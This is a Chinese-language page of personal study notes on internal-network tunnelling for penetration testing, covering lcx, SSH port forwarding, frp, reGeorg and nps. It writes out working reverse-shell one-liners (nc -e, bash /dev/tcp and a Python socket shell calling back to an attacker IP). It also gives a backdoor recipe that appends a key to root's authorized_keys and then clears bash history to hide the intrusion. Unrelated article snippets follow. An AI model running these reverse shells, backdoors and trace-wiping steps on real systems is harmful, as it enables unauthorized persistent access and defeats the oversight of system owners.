当前位置: 首页 > news >正文

内网隧道学习笔记

1.基础:

一、端口转发和端口映射
1.端口转发是把一个端口的流量转发到另一个端口
2.端口映射是把一个端口映射到另一个端口上

二、http代理和socks代理
1.http带那里用http协议、主要工作在应用层,主要用来代理浏览网页。
2.socks代理用的是socks协议、工作在会话层,主要用来传递数据包。socks代理又分为socks4和sockes5,socks4只持支tcp,socks5同时支持tcp和udp

三、正向代理和反向代理
1.正向是从攻击者电脑主动访问目标机器、例如通过主动访问目标简历shell是正向shell。
2.反向是从目标机器主动来连接攻击者电脑,例如通过目标机器执行操作访问攻击者电脑建立的shell是反向shell

2.端口转发:

一、Lcx
1.Lcx -listen <监听><监听转发到的端口>#属于本地之间的端口转发
2.Lcx -slave <攻击机IP><端口><目标ip><目标端口> #把目标机器端口转到攻击机
3.lcx -tran 等待连接端口><目标ip><目标端口>
二、ssh端口转发
-C(ya请求压缩数据)、-D(动态转发即socks代理)、-f(后台执行ssh指令)
-g(运行远程主机连接主机转发的端口)、-L(本地转发)、-N(不执行远程指令等待状态)、-R远程转发
https://blog.csdn.net/MyySophia/article/details/128211718

3.反弹shell:

一、nc反弹
1.正向 目标机器执行(nc-lvvp 1111 -e /bin/bash(windwos换成cmd.exe)),攻击者执行( nc 目标地址 1111)
2.反向shell 攻击者监听(nc-lvvp 1111) 目标机器执行(nc -e /bin/bash 攻击者地址 1111)

二 bash 反弹
攻击机监听 1111
目标机执行:bash -i >& /dev/tcp/攻击机ip/1111 0>&1

三、python反弹
攻击机监听 1111

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.111.2",1111));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

四、隧道工具

一、linux客户端代理工具-proxychains
文件位置:/etc/proxychains.conf
配置语法、Socks5 代理地址 端口
二、SSH 隧道

在你的电脑上,运行SSH命令来建立SSH隧道。假设你的电脑可以访问主机A(通常是一个具有公网IP的服务器),主机A和C之间网络互通。ssh -L localhost:local_port:c.internal.ip:80 user@hostA
其中:localhost:local_port 是你本地电脑上的地址和端口,例如 localhost:8888。c.internal.ip:80 是内网中Web服务所在主机C的内网IP和端口。user@hostA 是可以访问主机A的用户名和主机地址。在你的浏览器中,访问 http://localhost:local_port,你将通过SSH隧道看到主机C上Web服务的内容。确保SSH隧道保持开启状态,以便不断地通过安全通道转发流量。如果你关闭了SSH会话,隧道也会断开。要持久保持隧道,可以使用 autossh 工具,它会定期检查隧道,并在断开时尝试重新建立。
如下:
docker环境下本地127.0.0.1:8996 目的主机A36.138.41.66 主机C 10.18.204.120:8080 
payload:ssh -p 39464 -L 127.0.0.1:8996:10.18.204.120:8080 root@36.138.41.66

三、frp内网穿透工具
https://github.com/fatedier/frp/releases

正向代理TCP端口协议服务器端配置:[common]
bind_port = 7000
#token = abc123
dashboard_port = 7500
dashboard_user = user
dashboard_pwd = password客户端:
[common]
server_addr = 192.168.3.25
server_port = 7000
#token = abc123
[rdp]
type = tcp
local_ip = 127.0.0.1
local_port = 3389
remote_port = 33389正向htpp端口协议(1.http需要以域名访问,vhost_http_port 不宜设置过大不然浏览器会限制,也可以在浏览器解除限制)
服务端:
[common]
bind_port = 7000
#token = abc123
dashboard_port = 7500
dashboard_user = user
dashboard_pwd = password
vhost_http_port = 8980
vhost_https_port = 8943客户端:
[common]
server_addr = 192.168.3.25
server_port = 7000
#token = abc123
[http]
type = http
local_ip = 127.0.0.1
local_port = 80
#此为设置服务器域名
custom_domains =test.com 反向代理socks5协议,由目标服务器发起连接
vps服务器端配置:
[common]
bind_port = 7000
#token = abc123
dashboard_port = 7500
dashboard_user = user
dashboard_pwd = password目标服务器设置
[common]
server_addr = 116.*.*.*  //服务端IP,这里我是放在服务器上的
server_port = 7000       //与服务端建立连接的端口,要和服务端的一致[target1]                //代理隧道的名称,这个随便定义
type = tcp              //通行类型,默认tcp就行
remote_port = 1234     //通信端口,注意通信端口和连接端口是两码事,一个作用于客户端与服务端的连接,一个作用于流量转发
plugin = socks5         //代理类型使用
/frps -c frps.ini 
/frpc -c frpc.ini 

四、reGeorg-正向,服务器跳板机不出网的情况下
上传对应脚本到服务器http://192.168.111.18/tunnel.php
在这里插入图片描述

执行命令python reGeorgSocksProxy.py -l 本地地址 -p 本地端口 -u http://192.168.111.18/tunnel.php

五、nps-web界面操作
服务端nps下载

wget https://github.com/ehang-io/nps/releases/download/v0.26.10/linux_amd64_server.tar.gz

解压

tar -zxvf linux_amd64_server.tar.gz
安装前要配置/etc/nps/conf/nps.conf
参考官网https://gitee.com/penry/nps?skip_mobile=true#socks5%E4%BB%A3%E7%90%86
./nps install #安装nps
操作:nps test|start|stop|restart|status

安装客户端NPC下载

wget https://github.com/ehang-io/nps/releases/download/v0.26.10/linux_amd64_client.tar.gz
tar -zxvf linux_amd64_client.tar.gz
npc -server=xxx.xxxxxxx.xxx:22002 -vkey=qingtongqingc@test1 -type=tcp

五、ssh后门:

./root/.ssh/#这个没有再远程主机自己创建得用命令创建还得有读写权限

本机生成无密码公钥
ssh-keygen -t rsa
然后上传到远程服务器追加到root/.ssh/authorized_keys内
无论是拿自己的私钥公钥对还是远程服务器的公钥私钥对,都要把公钥写入authorized_keys内
第二个后门:SSH公私钥免密登录
在这里插入图片描述
id_rsa 为私钥,id_rsa.pub 为公钥,将 id_rsa.pub 文件内容追加到目标服务器的/root/.ssh/authorized_keys内,即可完成
在这里插入图片描述
追加文件内容echo “xxx” >> /root/.ssh/authorized_keys
在这里插入图片描述
好了,后门已经留下,清空一下历史记录
清除所有历史history -cw
清除保存的用户操作历史记录
echo > ~/.bash_history
echo “” > ~/.bash_history

相关文章:

内网隧道学习笔记

1.基础&#xff1a; 一、端口转发和端口映射 1.端口转发是把一个端口的流量转发到另一个端口 2.端口映射是把一个端口映射到另一个端口上 二、http代理和socks代理 1.http带那里用http协议、主要工作在应用层&#xff0c;主要用来代理浏览网页。 2.socks代理用的是socks协议、…...

Umi-OCR:功能强大且易于使用的本地照片识别软件

Umi-OCR是一款开源且免费的离线OCR&#xff08;光学字符识别&#xff09;软件&#xff0c;可让您轻松从照片中提取文本。它支持多种语言&#xff0c;并具有许多其他功能使其成为照片识别任务的绝佳选择。 Umi-OCR的优势 离线操作&#xff1a; Umi-OCR无需互联网连接即可工作&…...

HarmonyOS开发商城商品详情-底部导航

目录 一:功能概述 二:代码实现 三:效果图 一:功能概述 上一节我们实现了商品详情页基础信息展示,这一节主要实现底部立即购买和加入购物车的功能。首先我们需要在底部创建两个按钮,这两个按钮固定字底部,不随页面滚动。点击添加购物车按钮,会出现一个对话框,显示商…...

C语言 ——— 学习、使用 strcat函数 并模拟实现

目录 学习strcat函数​编辑 使用strcat函数​编辑 模拟实现strcat函数 学习strcat函数 strcat函数所需要的头文件&#xff1a; #include<string.h> strcat函数的参数解析&#xff1a; 将 source 字符串追加到 destination 字符串。destination 中的字符串结束标志…...

视频超压缩保持质量 ffmpeg

参考&#xff1a; https://x.com/mortenjust/status/1817991110544744764 基于 FFMpeg 的 H264 压缩标准&#xff0c;实现压缩 90% 的视频大小 在线体验地址&#xff1a; https://tools.rotato.app/compress ffmpeg命令执行 ffmpeg -i "C:\Users\loong\Downloads\屏幕录…...

大型语言模型入门

大型语言模型ChatGPT 快速、全面了解大型语言模型。学习李宏毅课程笔记。 ChatGPT 目前由OpenAI公司发明的非常火的人工智能AI应用ChatGPT&#xff0c;到底是什么原理呢&#xff1f; G&#xff1a;Generative(生成) P&#xff1a;Pre-trained(预训练) T&#xff1a;Transform…...

canvas-视频绘制

通过Canvas元素来实时绘制一个视频帧&#xff0c;并在视频帧上叠加一个图片的功能可以当作水印。 获取Canvas元素&#xff1a; let canvas document.getElementById(canvas) 通过getElementById函数获取页面中ID为canvas的Canvas元素&#xff0c;并将其存储在变量canvas中。 …...

红酒与美食搭配:味觉的新探索

在美食的世界里&#xff0c;红酒如同一位优雅的舞者&#xff0c;与各种佳肴共舞&#xff0c;创造出无尽的味觉惊喜。当定制红酒洒派红酒&#xff08;Bold & Generous&#xff09;与各式美食相遇&#xff0c;便开启了一场味觉的新探索之旅。 一、红酒与美食的邂逅&#xff…...

大模型日报 2024-08-02

大模型日报 2024-08-02 大模型资讯 博思艾伦在国际空间站部署先进语言模型 摘要: 博思艾伦在国际空间站上的超级计算机上运行了一种生成式人工智能大型语言模型。这一举措标志着语言模型在太空应用方面的重大进展。 人工智能助力研发安全有效的新型抗生素对抗耐药细菌 摘要: 德…...

【Pytorch】一文向您详细介绍 torch.sign()

&#x1f389;&#x1f9e0;**【Pytorch】一文向您详细介绍 torch.sign()** 下滑即可查看博客内容 &#x1f308; 欢迎莅临我的个人主页 &#x1f448;这里是我静心耕耘深度学习领域、真诚分享知识与智慧的小天地&#xff01;&#x1f387; &#x1f393; 博主简介&#xff…...

超级详细,如何手动安装python第三方库?

文章目录 1&#xff0c;python第三方库安装包有3种类型2&#xff0c;python第三方库安装包whl文件如何安装&#xff1f;3&#xff0c;python第三方库安装包zip和tar.gz文件如何安装&#xff1f;4&#xff0c; python第三方库安装包exe文件如何安装&#xff1f; 手动安装第三方库…...

WebSocket协议测试

WebSocket和HTTP接口有什么不一样 websocket和http都是网络接口数据交换的协议。都是基于TCP 协议区别 http&#xff1a;每次数据交互都是一个全新的请求&#xff1b;主动发起http请求调用(非实时) websocket:建立长久网络连接&#xff0c;服务器/客户端可以相互主动发数据…...

浅谈【C#】代码注册COM组件

在C#中注册COM组件通常涉及到使用regasm工具或者在代码中使用System.Runtime.InteropServices命名空间下的RegisterTypeForComClients方法。 下面是两种方法的简要说明和示例&#xff1a; 1、使用 regasm 工具 regasm 是一个命令行工具&#xff0c;用于将.NET程序集注册为CO…...

C++数据结构学习(顺序表)

文章目录 顺序表杭州电子科技大学在线评测2008 数值统计使用顺序表实现 2014 青年歌手大奖赛_评委会打分 Leetcode题目[LCP 01. 猜数字](https://leetcode.cn/problems/guess-numbers/description/)[LCP 06. 拿硬币](https://leetcode.cn/problems/na-ying-bi/description/)[20…...

springboot宠物用品商城系统-前端-计算机毕业设计源码74346

摘要 基于微信小程序的宠物用品商城系统是一个集商品展示、在线购物、支付结算、用户管理等功能于一体的综合性电商平台。该系统充分利用微信小程序的便捷性和用户基础&#xff0c;为宠物爱好者提供了一个方便、快捷的购物体验。 同时&#xff0c;该系统还具备完善的用户管理功…...

【vue预览PDF文件的几种方法】

vue展示PDF文件的几种方法 使用Vue插件 你需要安装vue-pdf-embed: npm install vue-pdf-embed<template><div class"pdf-container"><VuePdfEmbed :src"pdfUrl" /></div> </template><script setup lang"ts"…...

学习安卓开发遇到的问题(未解决版,有没有人帮我看看,大哭,感谢)

问题1&#xff1a;学习禁用与恢复按钮中&#xff1a; java代码报错&#xff1a;报错代码是 R.id.btn_enable;case R.id.btn_disable;case R.id.btn_test: 代码如下&#xff1a;&#xff08;实现功能在代码后面&#xff09; package com.example.apptest;import static java.…...

C++必修:STL之vector的模拟实现

✨✨ 欢迎大家来到贝蒂大讲堂✨✨ &#x1f388;&#x1f388;养成好习惯&#xff0c;先赞后看哦~&#x1f388;&#x1f388; 所属专栏&#xff1a;C学习 贝蒂的主页&#xff1a;Betty’s blog 为了让我们更加深入理解vector&#xff0c;接下来我们将模拟实现一个简易版的vect…...

Unity Camera

课程目标 1. 了解摄像机&#xff08;camera&#xff09;不同视角的设计与实现&#xff1b;2. 感受在不同摄像机视角下观察虚拟场景。 喜欢玩游戏或者看3D动漫的朋友可以回忆在虚拟场景中摄像头的运动变化带来的视觉感受&#xff0c;例如&#xff1a;摄像头给场景中的主角来个…...

CSS雷达光波效果(前端雷达光波效果)

前言 CSS雷达光波效果是一种视觉动画效果&#xff0c;常用于模仿雷达扫描或检测的视觉反馈。这种效果通常涉及到动态的圆形或弧形图案&#xff0c;它们从一个中心点向外扩散&#xff0c;类似于水面上的涟漪或雷达扫描线。以下是创建CSS雷达光波效果的一些关键技术和步骤&#…...

conda相比python好处

Conda 作为 Python 的环境和包管理工具&#xff0c;相比原生 Python 生态&#xff08;如 pip 虚拟环境&#xff09;有许多独特优势&#xff0c;尤其在多项目管理、依赖处理和跨平台兼容性等方面表现更优。以下是 Conda 的核心好处&#xff1a; 一、一站式环境管理&#xff1a…...

TDengine 快速体验(Docker 镜像方式)

简介 TDengine 可以通过安装包、Docker 镜像 及云服务快速体验 TDengine 的功能&#xff0c;本节首先介绍如何通过 Docker 快速体验 TDengine&#xff0c;然后介绍如何在 Docker 环境下体验 TDengine 的写入和查询功能。如果你不熟悉 Docker&#xff0c;请使用 安装包的方式快…...

渗透实战PortSwigger靶场-XSS Lab 14:大多数标签和属性被阻止

<script>标签被拦截 我们需要把全部可用的 tag 和 event 进行暴力破解 XSS cheat sheet&#xff1a; https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 通过爆破发现body可以用 再把全部 events 放进去爆破 这些 event 全部可用 <body onres…...

Java-41 深入浅出 Spring - 声明式事务的支持 事务配置 XML模式 XML+注解模式

点一下关注吧&#xff01;&#xff01;&#xff01;非常感谢&#xff01;&#xff01;持续更新&#xff01;&#xff01;&#xff01; &#x1f680; AI篇持续更新中&#xff01;&#xff08;长期更新&#xff09; 目前2025年06月05日更新到&#xff1a; AI炼丹日志-28 - Aud…...

第一篇:Agent2Agent (A2A) 协议——协作式人工智能的黎明

AI 领域的快速发展正在催生一个新时代&#xff0c;智能代理&#xff08;agents&#xff09;不再是孤立的个体&#xff0c;而是能够像一个数字团队一样协作。然而&#xff0c;当前 AI 生态系统的碎片化阻碍了这一愿景的实现&#xff0c;导致了“AI 巴别塔问题”——不同代理之间…...

基于Docker Compose部署Java微服务项目

一. 创建根项目 根项目&#xff08;父项目&#xff09;主要用于依赖管理 一些需要注意的点&#xff1a; 打包方式需要为 pom<modules>里需要注册子模块不要引入maven的打包插件&#xff0c;否则打包时会出问题 <?xml version"1.0" encoding"UTF-8…...

UR 协作机器人「三剑客」:精密轻量担当(UR7e)、全能协作主力(UR12e)、重型任务专家(UR15)

UR协作机器人正以其卓越性能在现代制造业自动化中扮演重要角色。UR7e、UR12e和UR15通过创新技术和精准设计满足了不同行业的多样化需求。其中&#xff0c;UR15以其速度、精度及人工智能准备能力成为自动化领域的重要突破。UR7e和UR12e则在负载规格和市场定位上不断优化&#xf…...

第 86 场周赛:矩阵中的幻方、钥匙和房间、将数组拆分成斐波那契序列、猜猜这个单词

Q1、[中等] 矩阵中的幻方 1、题目描述 3 x 3 的幻方是一个填充有 从 1 到 9 的不同数字的 3 x 3 矩阵&#xff0c;其中每行&#xff0c;每列以及两条对角线上的各数之和都相等。 给定一个由整数组成的row x col 的 grid&#xff0c;其中有多少个 3 3 的 “幻方” 子矩阵&am…...

Rapidio门铃消息FIFO溢出机制

关于RapidIO门铃消息FIFO的溢出机制及其与中断抖动的关系&#xff0c;以下是深入解析&#xff1a; 门铃FIFO溢出的本质 在RapidIO系统中&#xff0c;门铃消息FIFO是硬件控制器内部的缓冲区&#xff0c;用于临时存储接收到的门铃消息&#xff08;Doorbell Message&#xff09;。…...

ABAP设计模式之---“简单设计原则(Simple Design)”

“Simple Design”&#xff08;简单设计&#xff09;是软件开发中的一个重要理念&#xff0c;倡导以最简单的方式实现软件功能&#xff0c;以确保代码清晰易懂、易维护&#xff0c;并在项目需求变化时能够快速适应。 其核心目标是避免复杂和过度设计&#xff0c;遵循“让事情保…...